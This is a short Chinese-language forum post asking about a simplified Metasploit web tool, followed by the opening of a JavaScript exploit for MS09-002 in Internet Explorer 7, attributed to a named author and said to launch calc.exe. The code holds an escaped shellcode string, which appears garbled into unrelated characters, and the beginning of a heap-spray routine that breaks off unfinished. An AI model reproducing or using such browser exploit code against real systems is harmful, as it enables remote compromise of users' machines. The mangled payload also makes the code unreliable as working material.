是不是要ODAY那本书里面的那个傻瓜化的MSF那个网页工具哦?
<script language="JavaScript">
<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.12 mail:qianyang@ssyeah.com
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
shellcode will popup the calc.exe
-->
var shellcode=unescape("%uE8FCD䖋謼ռŸ误ᡏ律Ġ䧫㒋Ƌ駀蒬瓀섇්숁吻Ф律Ĥ曫ಋ譋ᱟƋ觫쌄쀱譤삅౸䂋謌ᱰ训ࡨ৫肋°梋弼噠삃偻繨桳ﺘຊw揧污c");
var array = new Array();
var ls = 0x100000-(shellcode.length*2+0x01020);
var b = unescape("");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;